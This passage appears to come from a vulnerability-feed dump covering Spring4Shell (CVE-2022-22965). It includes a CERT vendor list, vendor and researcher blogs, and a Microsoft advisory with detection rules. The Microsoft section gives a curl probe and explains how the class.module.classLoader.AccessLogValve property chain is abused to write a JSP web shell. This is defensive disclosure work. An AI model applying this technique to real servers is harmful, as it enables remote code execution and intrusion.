\n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in a newer version of JDK an alternative method exists for such exploitation, for example, through Java 9 Platform Module System functionality. \nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 and below\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. SpEL is a special expression language created for Spring Framework that supports queries and object graph management at runtime. This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations for Spring vulnerabilities exploitation\n\nCVE-2022-22965 is fixed in 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): "Spring4Shell", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find "`spring-webmvc-*.jar`", "`spring-webflux*.jar`" or "`spring-boot*.jar`" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. it is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201dclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and 